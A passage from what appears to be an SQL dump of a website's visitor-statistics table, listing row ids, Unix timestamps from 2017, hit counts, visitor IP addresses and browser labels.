247.243','firefox'),(116140,1496147209,1,1,0,0,'185.182.81.78','chrome'),(116141,1496147236,1,1,0,0,'217.182.132.152','other'),(116142,1496147437,1,1,0,0,'51.255.71.131','other'),(116143,1496147471,1,1,0,0,'91.196.178.66','chrome'),(116144,1496147854,1,1,0,0,'164.132.161.72','other'),(116145,1496147865,1,1,0,0,'66.249.64.30','chrome'),(116146,1496148714,1,1,0,0,'91.196.178.131','firefox'),(116147,1496148735,1,1,0,0,'217.23.11.65','chrome'),(116148,1496148744,1,1,0,0,'217.182.132.63','other'),(116149,1496148751,1,0,1,0,'66.249.64.29',''),(116150,1496148775,1,0,1,0,'66.249.64.28',''),(116151,1496149146,1,1,0,0,'207.46.13.118','other'),(116152,1496149491,1,1,0,0,'8.29.198.26','other'),(116153,1496149790,1,1,0,0,'217.182.132.97','other'),(116154,1496150535,1,1,0,0,'217.23.11.65','chrome'),(116155,1496151467,1,1,0,0,'51.255.65.8','other'),(116156,1496151594,1,0,1,0,'66.249.64.28',''),(116157,1496151604,1,1,0,0,'217.182.132.88','other'),(116158,1496151751,1,1,0,0,'164.132.162.158','other'),(116159,1496151885,1,1,0,0,'66.249.64.157','chrome'),(116160,1496152073,1,1,0,0,'217.182.132.18','other'),(116161,1496152130,1,1,0,0,'217.182.132.147','other'),(116162,1496152175,1,1,0,0,'51.255.65.68','other'),(116163,1496152331,1,1,0,0,'91.196.177.26','chrome'),(116164,1496152335,1,1,0,0,'217.23.11.65','chrome'),(116165,1496152430,1,1,0,0,'37.53.30.219','chrome'),(116166,1496152849,1,1,0,0,'51.255.65.11','other'),(116167,1496152881,1,1,0,0,'217.182.132.51','other'),(116168,1496153024,1,1,0,0,'66.249.64.28','chrome'),(116169,1496153340,1,1,0,0,'217.182.132.178','other'),(116170,1496153346,1,0,1,0,'66.249.64.155',''),(116171,1496153852,1,0,1,0,'68.180.230.48',''),(116172,1496153889,1,1,0,0,'91.196.178.66','firefox'),(116173,1496153906,1,1,0,0,'62.80.169.116','chrome'),(116174,1496154109,1,1,0,0,'94.178.146.56','firefox'),(116175,1496154135,1,1,0,0,'217.23.11.65','chrome'),(116176,1496154411,1,1,0,0,'51.255.65.20','other'),(116177,1496154664,1,1,0,0,'40.77.167.131','other'),(116178,1496154901,1,1,0,0,'164.132.161.76','other'),(116179,1496154940,1,1,0,0,'217.182.132.146','other'),(116180,1496155509,1,1,0,0,'157.55.39.167','other'),(116181,1496155935,1,1,0,0,'217.23.11.65','chrome'),(116182,1496156210,1,1,0,0,'91.196.178.134','chrome'),(116183,1496156231,1,1,0,0,'95.108.179.8','other'),(116184,1496156978,1,1,0,0,'164.132.161.48','other'),(116185,1496157303,1,1,0,0,'164.132.161.5','other'),(116186,1496157353,1,0,1,0,'66.249.64.28',''),(116187,1496157438,1,0,1,0,'66.249.64.29',''),(116188,1496157540,2,2,0,0,'91.209.11.236','other'),(116189,1496157733,1,1,0,0,'217.182.132.7','other'),(116190,1496157735,1,1,0,0,'217.23.11.65','chrome'),(116191,1496157792,1,1,0,0,'40.77.167.131','other'),(116192,1496158166,1,1,0,0,'164.132.161.24','other'),(116193,1496158264,1,1,0,0,'91.196.178.134','chrome'),(116194,1496158276,1,1,0,0,'93.158.152.60','other'),(116195,1496158569,1,1,0,0,'109.192.228.149','firefox'),(116196,1496159083,1,0,1,0,'66.249.64.29',''),(116197,1496159535,1,1,0,0,'217.23.11.65','chrome'),(116198,1496160109,1,0,1,0,'68.180.230.48',''),(116199,1496160342,1,1,0,0,'8.29.198.27','other'),(116200,1496160897,1,1,0,0,'217.182.132.96','other'),(116201,1496161337,1,1,0,0,'217.23.11.65','chrome'),(116202,1496161788,1,0,1,0,'66.249.64.28',''),(116203,1496162098,1,1,0,0,'51.255.65.62','other'),(116204,1496162122,1,1,0,0,'217.182.132.191','other'),(116205,1496162889,1,1,0,0,'51.255.65.27','other'),(116206,1496163136,1,1,0,0,'217.23.11.65','chrome'),(116207,1496164415,1,1,0,0,'66.249.64.28','chrome'),(116208,1496164449,1,1,0,0,'51.255.65.56','other'),(116209,1496164650,1,1,0,0,'217.182.132.78','other'),(116210,1496166772,1,0,1,0,'66.249.64.155',''),(116211,1496166813,1,0,1,0,'66.249.64.30',''),(116212,1496167415,1,1,0,0,'51.255.65.24','other'),(116213,1496167763,1,1,0,0,'164.132.161.46','other'),(116214,1496168403,1,1,0,0,'193.194.127.217','firefox'),(116215,1496168435,1,1,0,0,'217.69.133.3','other'),(116216,1496168573,1,1,0,0,'180.76.15.32','other'),(116217,1496168932,1,1,0,0,'217.182.132.55','other'),(116218,1496169142,1,1,0,0,'157.55.39.167','other'),(116219,1496169401,1,1,0,0,'141.8.132.50','other'),(116220,1496169431,1,1,0,0,'217.69.133.237','other'),(116221,1496169627,1,1,0,0,'137.74.201.108','other'),(116222,1496169806,1,1,0,0,'5.255.253.81','other'),(116223,1496170131,1,1,0,0,'157.55.39.167','other'),(116224,1496171098,1,1,0,0,'164.132.161.41','other'),(116225,1496171178,1,1,0,0,'51.255.65.20','other'),(116226,1496171453,1,1,0,0,'51.255.65.59','other'),(116227,1496171615,1,1,0,0,'65.19.138.33','other'),(116228,1496172715,1,1,0,0,'164.132.161.94','other'),(116229,1496173327,1,1,0,0,'157.55.39.152','other'),(116230,1496173882,2,0,2,0,'66.249.64.157',''),(116231,1496173922,2,0,2,0,'68.180.230.48',''),(116232,1496174037,1,1,0,0,'207.46.13.118','other'),(116233,1496174170,1,1,0,0,'164.132.161.7','other'),(116234,1496174728,1,1,0,0,'164.132.161.60','other'),(116235,1496174820,1,1,0,0,'164.132.161.46','other'),(116236,1496175249,1,1,0,0,'66.249.64.30','chrome'),(116237,1496175283,1,1,0,0,'66.249.64.29','chrome'),(116238,1496175301,1,1,0,0,'217.182.132.31','other'),(116239,1496176494,1,1,0,0,'51.255.65.26','other'),(116240,1496176510,1,1,0,0,'91.196.178.163','chrome'),(116241,1496176665,2,0,2,0,'66.249.64.153',''),(116242,1496176695,1,1,0,0,'66.249.64.28','chrome'),(116243,1496177040,1,1,0,0,'137.74.207.116','other'),(116244,1496177214,1,1,0,0,'217.182.132.150','other'),(116245,1496177855,1,0,1,0,'66.249.64.30',''),(116246,1496178050,1,1,0,0,'217.182.132.64','other'),(116247,1496179312,1,0,1,0,'66.249.64.28',''),(116248,1496179464,1,1,0,0,'51.255.65.31','other'),(116249,1496180185,1,1,0,0,'137.74.201.99','other'),(116250,1496180547,1,1,0,0,'217.182.132.177','other'),(116251,1496182079,1,1,0,0,'217.182.132.55','other'),(116252,1496182159,1,1,0,0,'217.182.132.21','other'),(116253,1496182223,1,1,0,0,'164.132.161.74','other'),(116254,1496182230,2,0,2,0,'66.249.64.30',''),(116255,1496182442,1,1,0,0,'8.29.198.25','other'),(116256,1496182600,1,1,0,0,'137.74.201.108','other'),(116257,1496182732,1,1,0,0,'51.255.65.3','other'),(116258,1496184110,1,1,0,0,'164.132.161.46','other'),(116259,1496184203,1,1,0,0,'66.249.64.28','chrome'),(116260,1496184475,1,1,0,0,'164.132.161.95','other'),(116261,1496184883,1,1,0,0,'51.255.65.25','other'),(116262,1496185065,1,0,1,0,'66.249.64.155',''),(116263,1496185281,1,1,0,0,'157.55.39.152','other'),(116264,1496186444,1,1,0,0,'157.55.39.143','other'),(116265,1496186629,1,1,0,0,'217.182.132.152','other'),(116266,1496187178,1,1,0,0,'217.182.132.80','other'),(116267,1496187485,1,1,0,0,'51.255.65.94','other'),(116268,1496187846,1,0,1,0,'66.249.64.30',''),(116269,1496188524,1,1,0,0,'109.192.228.149','other'),(116270,1496188533,1,1,0,0,'164.132.162.159','other'),(116271,1496188746,1,0,1,0,'66.249.64.157',''),(116272,1496188804,3,0,3,0,'66.249.64.155',''),(116273,1496189092,1,0,1,0,'66.249.64.153',''),(116274,1496189412,2,0,2,0,'66.249.64.30',''),(116275,1496189622,1,1,0,0,'66.249.64.155','chrome'),(116276,1496189897,1,1,0,0,'217.182.132.63','other'),(116277,1496190455,1,1,0,0,'164.132.161.38','other'),(116278,1496190814,1,1,0,0,'51.255.65.90','other'),(116279,1496191661,1,0,1,0,'68.180.230.48',''),(116280,1496191901,1,1,0,0,'66.249.64.28','chrome'),(116281,1496191955,1,0,1,0,'66.249.64.30',''),(116282,1496192222,1,1,0,0,'164.132.161.26','other'),(116283,1496193044,1,1,0,0,'217.182.132.88','other'),(116284,1496193274,1,1,0,0,'8.29.198.27','other'),(116285,1496193406,1,0,1,0,'66.249.64.30',''),(116286,1496193511,1,1,0,0,'157.55.39.35','other'),(116287,1496194654,1,0,1,0,'66.249.64.153',''),(116288,1496195453,1,1,0,0,'164.132.161.58','other'),(116289,1496195462,1,1,0,0,'217.182.132.157','other'),(116290,1496196841,1,1,0,0,'51.255.65.71','other'),(116291,1496197104,1,1,0,0,'164.132.161.39','other'),(116292,1496197528,1,1,0,0,'164.132.161.12','other'),(116293,1496197780,1,1,0,0,'51.255.65.25','other'),(116294,1496197855,1,1,0,0,'51.255.65.2','other'),(116295,1496198446,1,1,0,0,'217.182.132.37','other'),(116296,1496198866,1,1,0,0,'51.255.65.13','other'),(116297,1496199239,1,0,1,0,'66.249.64.29',''),(116298,1496199900,1,1,0,0,'217.182.132.96','other'),(116299,1496200252,1,1,0,0,'51.255.71.131','other'),(116300,1496200388,1,0,1,0,'66.249.64.30',''),(116301,1496200567,1,1,0,0,'51.255.65.83','other'),(116302,1496201220,1,1,0,0,'164.132.161.42','other'),(116303,1496201809,1,1,0,0,'51.255.71.128','other'),(116304,1496201836,1,1,0,0,'66.249.64.29','chrome'),(116305,1496201959,1,0,1,0,'66.249.64.157',''),(116306,1496201994,1,0,1,0,'66.249.64.155',''),(116307,1496202000,1,0,1,0,'66.249.64.153',''),(116308,1496202041,1,1,0,0,'66.249.64.30','chrome'),(116309,1496202053,1,1,0,0,'66.249.64.155','chrome'),(116310,1496202230,1,1,0,0,'217.182.132.84','other'),(116311,1496202328,1,1,0,0,'51.255.65.31','other'),(116312,1496203061,1,0,1,0,'68.180.231.23',''),(116313,1496203830,1,1,0,0,'176.193.107.184','other'),(116314,1496204101,1,1,0,0,'8.29.198.27','other'),(116315,1496204346,1,1,0,0,'51.255.65.61','other'),(116316,1496204857,1,1,0,0,'137.74.203.194','other'),(116317,1496204906,2,2,0,0,'66.249.64.157','chrome'),(116318,1496205176,1,1,0,0,'91.196.178.34','chrome'),(116319,1496205914,1,1,0,0,'91.196.178.69','firefox'),(116320,1496206555,1,1,0,0,'91.196.178.68','chrome'),(116321,1496207023,1,1,0,0,'217.182.132.57','other'),(116322,1496207246,1,0,1,0,'66.249.64.153',''),(116323,1496207313,1,0,1,0,'66.249.64.28',''),(116324,1496207345,1,1,0,0,'164.132.161.4','other'),(116325,1496207350,1,0,1,0,'66.249.64.157',''),(116326,1496207357,1,0,1,0,'66.249.64.155',''),(116327,1496207516,2,2,0,0,'91.196.178.70','firefox'),(116328,1496207625,1,0,1,0,'68.180.230.48',''),(116329,1496207636,1,1,0,0,'91.196.178.69','firefox'),(116330,1496207833,1,1,0,0,'137.74.207.159','other'),(116331,1496208567,2,2,0,0,'66.249.64.29','chrome'),(116332,1496208732,1,1,0,0,'66.249.64.30','chrome'),(116333,1496208861,1,1,0,0,'91.196.178.69','firefox'),(116334,1496209591,1,1,0,0,'91.196.178.70','chrome'),(116335,1496209993,1,1,0,0,'178.95.247.243','firefox'),(116336,1496210152,1,0,1,0,'66.249.64.30',''),(116337,1496210541,1,1,0,0,'91.196.178.68','chrome'),(116338,1496211053,2,2,0,0,'195.68.203.233','firefox'),(116339,1496211054,1,1,0,0,'51.255.71.126','other'),(116340,1496211070,1,1,0,0,'95.108.213.34','other'),(116341,1496211695,1,1,0,0,'176.31.231.10','other'),(116342,1496211730,1,0,1,0,'66.249.64.29',''),(116343,1496211743,1,0,1,0,'66.249.64.153',''),(116344,1496211790,1,1,0,0,'164.132.161.69','other'),(116345,1496211874,1,1,0,0,'95.132.14.217','firefox'),(116346,1496212076,1,1,0,0,'164.132.161.85','other'),(116347,1496212266,1,1,0,0,'157.55.39.35','other'),(116348,1496212416,1,1,0,0,'164.132.161.42','other'),(116349,1496212642,1,1,0,0,'66.249.64.29','chrome'),(116350,1496213071,1,1,0,0,'164.132.161.59','other'),(116351,1496213203,1,1,0,0,'164.132.161.92','other'),(116352,1496213654,1,1,0,0,'91.196.178.69','chrome'),(116353,1496213887,1,1,0,0,'164.132.162.157','other'),(116354,1496213926,1,0,1,0,'66.249.64.30',''),(116355,1496213947,2,0,2,0,'66.249.64.155',''),(116356,1496214010,1,0,1,0,'66.249.64.153',''),(116357,1496214108,1,0,1,0,'66.249.64.157',''),(116358,1496214183,1,1,0,0,'66.249.64.157','chrome'),(116359,1496214948,1,1,0,0,'8.29.198.26','other'),(116360,1496215680,1,1,0,0,'51.255.65.8','other'),(116361,1496216416,1,1,0,0,'164.132.161.31','other'),(116362,1496216546,1,1,0,0,'91.196.178.68','chrome'),(116363,1496216784,4,4,0,0,'46.229.168.71','other'),(116364,1496216801,6,6,0,0,'46.229.168.69','other'),(116365,1496216820,6,6,0,0,'46.229.168.68','other'),(116366,1496216842,5,5,0,0,'46.229.168.67','other'),(116367,1496216869,2,2,0,0,'46.229.168.72','other'),(116368,1496216913,3,3,0,0,'46.229.168.74','other'),(116369,1496216981,1,1,0,0,'46.229.168.65','other'),(116370,1496217014,1,1,0,0,'51.255.65.12','other'),(116371,1496217110,1,1,0,0,'46.229.168.73','other'),(116372,1496217123,1,1,0,0,'46.229.168.70','other'),(116373,1496217315,1,0,1,0,'66.249.64.157',''),(116374,1496217421,1,1,0,0,'95.132.14.217','firefox'),(116375,1496217598,1,1,0,0,'164.132.161.93','other'),(116376,1496217807,1,1,0,0,'195.149.70.22','other'),(116377,1496218054,1,1,0,0,'217.182.132.31','other'),(116378,1496218210,1,0,1,0,'66.249.64.29',''),(116379,1496218254,1,1,0,0,'51.255.65.27','other'),(116380,1496218475,1,1,0,0,'217.182.132.148','other'),(116381,1496218530,1,1,0,0,'213.174.11.139','firefox'),(116382,1496218571,1,0,1,0,'68.180.230.48',''),(116383,1496218645,1,1,0,0,'91.196.178.165','chrome'),(116384,1496219159,1,1,0,0,'91.196.177.118','chrome'),(116385,1496219251,1,1,0,0,'51.255.65.38','other'),(116386,1496219639,1,1,0,0,'91.196.178.70','firefox'),(116387,1496219964,1,1,0,0,'195.49.151.89','chrome'),(116388,1496219984,1,1,0,0,'95.108.213.34','other'),(116389,1496220091,1,1,0,0,'91.196.178.162','chrome'),(116390,1496220133,1,1,0,0,'66.249.64.29','chrome'),(116391,1496220270,1,0,1,0,'66.249.64.157',''),(116392,1496220427,1,1,0,0,'51.255.65.27','other'),(116393,1496220729,1,1,0,0,'217.182.132.73','other'),(116394,1496221196,1,1,0,0,'217.182.132.15','other'),(116395,1496221834,1,0,1,0,'66.249.64.157',''),(116396,1496221898,1,1,0,0,'207.46.13.118','other'),(116397,1496221905,1,0,1,0,'66.249.64.30',''),(116398,1496221987,1,1,0,0,'91.196.178.68','chrome'),(116399,1496222211,1,1,0,0,'164.132.161.79','other'),(116400,1496222395,1,1,0,0,'141.8.142.164','other'),(116401,1496222665,1,1,0,0,'66.249.64.155','chrome'),(116402,1496222988,1,1,0,0,'51.255.65.52','other'),(116403,1496223209,1,1,0,0,'207.46.13.118','other'),(116404,1496223669,1,1,0,0,'91.196.178.68','firefox'),(116405,1496224162,1,1,0,0,'51.255.65.224','other'),(116406,1496224648,1,1,0,0,'51.255.65.42','other'),(116407,1496224825,1,1,0,0,'180.76.15.22','other'),(116408,1496224987,1,1,0,0,'151.80.27.116','other'),(116409,1496225190,1,1,0,0,'91.196.178.70','firefox'),(116410,1496225355,1,1,0,0,'66.249.93.93','chrome'),(116411,1496225686,1,1,0,0,'91.196.178.102','chrome'),(116412,1496225782,1,1,0,0,'8.29.198.25','other'),(116413,1496225811,1,1,0,0,'51.255.65.60','other'),(116414,1496225823,1,1,0,0,'51.255.65.10','other'),(116415,1496226368,2,0,2,0,'66.249.64.30',''),(116416,1496227009,1,0,1,0,'66.249.64.29',''),(116417,1496227221,1,1,0,0,'185.184.170.105','other'),(116418,1496227361,1,0,1,0,'66.249.64.30',''),(116419,1496227424,1,1,0,0,'95.132.9.232','chrome'),(116420,1496227452,1,1,0,0,'66.249.64.30','chrome'),(116421,1496227950,1,1,0,0,'164.132.161.67','other'),(116422,1496227964,1,1,0,0,'164.132.161.19','other'),(116423,1496228016,1,1,0,0,'51.255.65.19','other'),(116424,1496228063,2,0,2,0,'66.249.64.155',''),(116425,1496228084,1,0,1,0,'66.249.64.153',''),(116426,1496228482,1,1,0,0,'95.132.11.134','firefox'),(116427,1496228514,1,1,0,0,'164.132.161.97','other'),(116428,1496228562,1,1,0,0,'164.132.161.52','other'),(116429,1496229301,1,0,1,0,'68.180.230.48',''),(116430,1496229754,1,1,0,0,'137.74.201.100','other'),(116431,1496230152,1,1,0,0,'66.249.64.153','chrome'),(116432,1496230246,1,1,0,0,'212.90.189.96','msie'),(116433,1496231069,1,1,0,0,'91.196.177.15','chrome'),(116434,1496231349,1,0,1,0,'66.249.64.155',''),(116435,1496231502,1,1,0,0,'157.55.39.35','other'),(116436,1496231847,1,1,0,0,'217.182.132.7','other'),(116437,1496232006,1,1,0,0,'91.196.178.68','other'),(116438,1496232402,1,1,0,0,'217.182.132.15','other'),(116439,1496232572,1,1,0,0,'162.210.196.98','other'),(116440,1496232626,2,2,0,0,'178.92.29.110','chrome'),(116441,1496232687,1,0,1,0,'66.249.64.28',''),(116442,1496232747,1,1,0,0,'195.211.175.37','firefox'),(116443,1496232870,1,1,0,0,'91.230.25.108','firefox'),(116444,1496233080,1,1,0,0,'91.196.178.72','chrome'),(116445,1496233218,1,1,0,0,'66.249.64.29','chrome'),(116446,1496233324,1,1,0,0,'51.255.65.95','other'),(116447,1496233795,1,1,0,0,'51.255.65.54','other'),(116448,1496233820,1,1,0,0,'5.189.150.231','other'),(116449,1496234038,1,1,0,0,'51.255.71.113','other'),(116450,1496234787,1,1,0,0,'51.255.65.89','other'),(116451,1496234936,1,1,0,0,'164.132.161.80','other'),(116452,1496235004,1,1,0,0,'51.255.65.40','other'),(116453,1496235138,1,1,0,0,'92.113.33.54','chrome'),(116454,1496235192,1,1,0,0,'95.135.34.174','firefox'),(116455,1496235269,1,1,0,0,'109.192.228.149','other'),(116456,1496235284,1,1,0,0,'91.196.178.68','chrome'),(116457,1496235403,1,0,1,0,'66.249.64.153',''),(116458,1496235432,3,0,3,0,'66.249.64.157',''),(116459,1496235457,1,1,0,0,'217.182.132.58','other'),(116460,1496235582,1,0,1,0,'68.180.230.48',''),(116461,1496235928,1,1,0,0,'217.182.132.147','other'),(116462,1496235940,1,1,0,0,'188.166.25.25','firefox'),(116463,1496236605,1,1,0,0,'8.29.198.26','other'),(116464,1496236893,1,0,1,0,'66.249.64.30',''),(116465,1496236975,1,1,0,0,'91.196.178.70','firefox'),(116466,1496237175,1,1,0,0,'66.249.64.28','chrome'),(116467,1496237262,1,1,0,0,'164.132.161.54','other'),(116468,1496237379,1,1,0,0,'91.196.178.165','chrome'),(116469,1496237675,1,1,0,0,'51.255.65.60','other'),(116470,1496237697,1,1,0,0,'195.22.111.146','firefox'),(116471,1496237821,1,1,0,0,'51.255.65.97','other'),(116472,1496237871,2,0,2,0,'66.249.64.157',''),(116473,1496238026,1,0,1,0,'66.249.64.153',''),(116474,1496238051,2,2,0,0,'95.132.14.217','firefox'),(116475,1496238139,1,0,1,0,'66.249.64.30',''),(116476,1496238197,1,1,0,0,'164.132.161.73','other'),(116477,1496239150,1,1,0,0,'217.182.132.62','other'),(116478,1496239169,1,1,0,0,'95.132.14.217','firefox'),(116479,1496239297,1,1,0,0,'37.52.19.71','chrome'),(116480,1496239885,1,1,0,0,'37.54.18.1','firefox'),(116481,1496240372,1,1,0,0,'217.182.132.57','other'),(116482,1496240740,1,1,0,0,'109.236.81.202','msie'),(116483,1496241269,1,1,0,0,'217.182.132.173','other'),(116484,1496241370,1,1,0,0,'157.55.39.189','other'),(116485,1496241851,1,1,0,0,'51.255.65.89','other'),(116486,1496241859,5,0,5,0,'66.249.64.155',''),(116487,1496241988,1,1,0,0,'194.187.216.7','chrome'),(116488,1496242230,1,1,0,0,'51.255.71.122','other'),(116489,1496242450,2,0,2,0,'66.249.64.29',''),(116490,1496242536,1,0,1,0,'66.249.64.153',''),(116491,1496242666,1,0,1,0,'66.249.64.157',''),(116492,1496242764,1,1,0,0,'217.182.132.191','other'),(116493,1496242968,1,1,0,0,'51.255.65.55','other'),(116494,1496243186,1,1,0,0,'51.255.65.13','other'),(116495,1496243189,1,1,0,0,'66.249.64.155','chrome'),(116496,1496243263,1,1,0,0,'51.255.71.129','other'),(116497,1496243362,1,1,0,0,'51.255.65.66','other'),(116498,1496243520,1,0,1,0,'66.249.64.30',''),(116499,1496243547,1,1,0,0,'51.255.65.224','other'),(116500,1496243627,1,1,0,0,'51.255.65.4','other'),(116501,1496243875,1,1,0,0,'217.182.132.55','other'),(116502,1496243991,1,1,0,0,'88.135.247.252','chrome'),(116503,1496244189,1,1,0,0,'217.182.132.187','other'),(116504,1496244326,1,1,0,0,'51.255.71.121','other'),(116505,1496244536,1,1,0,0,'109.236.81.202','msie'),(116506,1496244585,1,1,0,0,'164.132.161.50','other'),(116507,1496244673,1,1,0,0,'164.132.161.74','other'),(116508,1496244695,1,0,1,0,'66.249.64.153',''),(116509,1496245967,3,3,0,0,'109.236.81.202','msie'),(116510,1496245997,1,1,0,0,'217.182.132.88','other'),(116511,1496246282,1,1,0,0,'164.132.161.21','other'),(116512,1496246583,1,1,0,0,'157.55.39.189','other'),(116513,1496246781,1,1,0,0,'217.182.132.153','other'),(116514,1496247437,1,1,0,0,'8.29.198.25','other'),(116515,1496247631,1,1,0,0,'51.255.65.65','other'),(116516,1496247797,1,1,0,0,'51.255.65.74','other'),(116517,1496248213,1,1,0,0,'157.55.39.189','other'),(116518,1496248890,1,1,0,0,'213.179.252.71','chrome'),(116519,1496249197,1,1,0,0,'164.132.161.17','other'),(116520,1496249400,2,0,2,0,'66.249.64.153',''),(116521,1496249445,1,0,1,0,'66.249.64.155',''),(116522,1496249531,1,0,1,0,'66.249.64.157',''),(116523,1496249535,1,1,0,0,'217.182.132.150','other'),(116524,1496249957,2,2,0,0,'207.46.13.118','other'),(116525,1496250225,3,3,0,0,'91.209.11.236','other'),(116526,1496250600,1,0,1,0,'66.249.64.28',''),(116527,1496250765,1,1,0,0,'51.255.65.32','other'),(116528,1496251004,1,1,0,0,'217.182.132.171','other'),(116529,1496251202,1,1,0,0,'217.182.132.73','other'),(116530,1496251351,1,1,0,0,'66.249.64.157','chrome'),(116531,1496251525,1,1,0,0,'217.182.132.91','other'),(116532,1496251703,1,1,0,0,'106.75.33.183','chrome'),(116533,1496252271,2,2,0,0,'207.46.13.118','other'),(116534,1496252644,1,1,0,0,'91.209.11.236','other'),(116535,1496252878,1,1,0,0,'178.154.149.3','other'),(116536,1496252972,1,0,1,0,'66.249.64.30',''),(116537,1496253015,1,0,1,0,'66.249.64.16',''),(116538,1496253186,1,1,0,0,'217.182.132.5','other'),(116539,1496253299,1,0,1,0,'66.249.64.17',''),(116540,1496254618,1,1,0,0,'217.182.132.62','other'),(116541,1496255144,1,1,0,0,'51.255.65.97','other'),(116542,1496255762,1,1,0,0,'91.196.178.164','chrome'),(116543,1496255850,74,74,0,0,'178.8.210.33','other'),(116544,1496255938,1,0,1,0,'66.249.64.157',''),(116545,1496256292,1,1,0,0,'91.209.11.236','other'),(116546,1496256444,1,1,0,0,'164.132.161.18','other'),(116547,1496256644,1,1,0,0,'217.182.132.184','other'),(116548,1496258018,1,1,0,0,'91.209.11.236','other'),(116549,1496258264,1,1,0,0,'8.29.198.26','other'),(116550,1496258737,1,1,0,0,'95.108.213.34','other'),(116551,1496259218,1,1,0,0,'217.182.132.68','other'),(116552,1496259281,1,1,0,0,'164.132.161.21','other'),(116553,1496259313,2,0,2,0,'66.249.64.155',''),(116554,1496259600,1,1,0,0,'141.8.142.15','other'),(116555,1496259750,1,1,0,0,'91.196.178.38','firefox'),(116556,1496260513,1,0,1,0,'66.249.64.29',''),(116557,1496260520,1,1,0,0,'51.255.65.83','other'),(116558,1496260935,1,1,0,0,'164.132.162.153','other'),(116559,1496261095,1,1,0,0,'66.249.64.29','chrome'),(116560,1496261098,1,1,0,0,'66.102.6.104','chrome'),(116561,1496261133,1,1,0,0,'178.154.200.2','other'),(116562,1496261215,6,6,0,0,'95.108.179.15','other'),(116563,1496261286,1,0,1,0,'66.249.64.153',''),(116564,1496261307,2,2,0,0,'5.255.253.63','other'),(116565,1496261316,2,0,2,0,'66.249.64.155',''),(116566,1496261331,10,10,0,0,'141.8.142.15','other'),(116567,1496261389,3,3,0,0,'141.8.142.154','other'),(116568,1496261390,1,1,0,0,'164.132.161.46','other'),(116569,1496261404,2,2,0,0,'87.250.224.7','other'),(116570,1496261437,1,1,0,0,'5.255.253.58','other'),(116571,1496261466,1,1,0,0,'141.8.142.164','other'),(116572,1496261504,1,1,0,0,'95.108.181.13','other'),(116573,1496261543,1,1,0,0,'87.250.224.18','other'),(116574,1496261564,4,4,0,0,'95.108.213.34','other'),(116575,1496261880,1,1,0,0,'51.255.65.30','other'),(116576,1496261907,1,1,0,0,'51.255.65.65','other'),(116577,1496262276,1,1,0,0,'207.46.13.118','other'),(116578,1496262427,1,1,0,0,'164.132.162.155','other'),(116579,1496262905,1,1,0,0,'137.74.207.114','other'),(116580,1496263290,1,1,0,0,'217.182.132.18','other'),(116581,1496263580,1,1,0,0,'95.108.213.8','other'),(116582,1496263591,1,1,0,0,'178.92.8.27','chrome'),(116583,1496263737,1,1,0,0,'217.182.132.193','other'),(116584,1496263744,1,1,0,0,'87.250.224.18','other'),(116585,1496264108,1,1,0,0,'217.182.132.176','other'),(116586,1496264210,1,1,0,0,'51.255.71.101','other'),(116587,1496265177,1,1,0,0,'164.132.161.83','other'),(116588,1496265374,3,3,0,0,'141.8.132.39','other'),(116589,1496265391,1,1,0,0,'87.250.224.7','other'),(116590,1496265394,1,1,0,0,'178.154.189.14','other'),(116591,1496265405,1,1,0,0,'141.8.142.38','other'),(116592,1496265626,1,1,0,0,'178.154.200.37','other'),(116593,1496265730,1,1,0,0,'66.249.64.29','chrome'),(116594,1496265941,1,0,1,0,'66.249.64.155',''),(116595,1496266078,1,1,0,0,'51.255.71.111','other'),(116596,1496266171,1,1,0,0,'66.249.64.153','chrome'),(116597,1496266244,1,1,0,0,'51.255.65.43','other'),(116598,1496266385,1,0,1,0,'66.249.64.28',''),(116599,1496266446,1,1,0,0,'51.255.65.37','other'),(116600,1496266993,1,1,0,0,'40.77.167.85','other'),(116601,1496267416,1,1,0,0,'217.182.132.93','other'),(116602,1496267503,3,3,0,0,'95.108.179.15','other'),(116603,1496267512,2,2,0,0,'87.250.224.7','other'),(116604,1496267925,1,1,0,0,'51.255.65.63','other'),(116605,1496267970,2,1,1,0,'66.249.64.157',''),(116606,1496268142,1,1,0,0,'217.182.132.72','other'),(116607,1496268153,1,1,0,0,'91.196.178.163','firefox'),(116608,1496268368,1,1,0,0,'164.132.162.158','other'),(116609,1496268426,1,1,0,0,'51.255.65.62','other'),(116610,1496268452,1,1,0,0,'217.182.132.68','other'),(116611,1496268737,1,1,0,0,'164.132.161.14','other'),(116612,1496268855,1,0,1,0,'66.249.64.153',''),(116613,1496268986,1,1,0,0,'217.182.132.50','other'),(116614,1496269017,1,1,0,0,'217.182.132.32','other'),(116615,1496269093,1,1,0,0,'164.132.161.41','other'),(116616,1496269106,1,1,0,0,'8.29.198.26','other'),(116617,1496269251,1,1,0,0,'164.132.161.78','other'),(116618,1496270290,1,1,0,0,'137.74.207.110','other'),(116619,1496270311,1,1,0,0,'95.108.179.15','other'),(116620,1496270741,1,1,0,0,'217.182.132.177','other'),(116621,1496270786,1,1,0,0,'51.255.65.72','other'),(116622,1496271003,1,1,0,0,'66.102.9.134','chrome'),(116623,1496271089,1,1,0,0,'87.250.224.7','other'),(116624,1496271236,1,1,0,0,'164.132.161.41','other'),(116625,1496271510,1,1,0,0,'217.182.132.67','other'),(116626,1496271743,1,1,0,0,'66.249.83.6','chrome'),(116627,1496272309,1,1,0,0,'180.76.15.148','other'),(116628,1496272555,1,1,0,0,'51.255.65.41','other'),(116629,1496272930,1,1,0,0,'164.132.161.8','other'),(116630,1496272962,1,1,0,0,'95.108.179.15','other'),(116631,1496273126,1,1,0,0,'51.255.65.43','other'),(116632,1496273494,1,1,0,0,'87.250.224.7','other'),(116633,1496273553,1,1,0,0,'40.77.167.85','other'),(116634,1496273986,1,1,0,0,'217.182.132.182','other'),(116635,1496274061,1,1,0,0,'51.255.65.43','other'),(116636,1496274210,1,1,0,0,'164.132.162.153','other'),(116637,1496274423,1,1,0,0,'95.108.179.15','other'),(116638,1496274504,1,0,1,0,'66.249.64.29',''),(116639,1496274536,2,0,2,0,'66.249.64.155',''),(116640,1496274714,1,1,0,0,'207.46.13.118','other'),(116641,1496274946,1,1,0,0,'141.8.142.15','other'),(116642,1496274993,1,1,0,0,'217.182.132.20','other'),(116643,1496275274,1,1,0,0,'217.182.132.192','other'),(116644,1496275483,1,0,1,0,'66.249.64.153',''),(116645,1496275834,1,1,0,0,'137.74.207.116','other'),(116646,1496276022,1,1,0,0,'217.182.132.155','other'),(116647,1496276402,1,1,0,0,'164.132.161.80','other'),(116648,1496276451,1,1,0,0,'51.255.65.46','other'),(116649,1496276666,1,1,0,0,'164.132.161.5','other'),(116650,1496276866,1,1,0,0,'164.132.161.64','other'),(116651,1496276928,1,1,0,0,'164.132.161.43','other'),(116652,1496277742,1,1,0,0,'217.182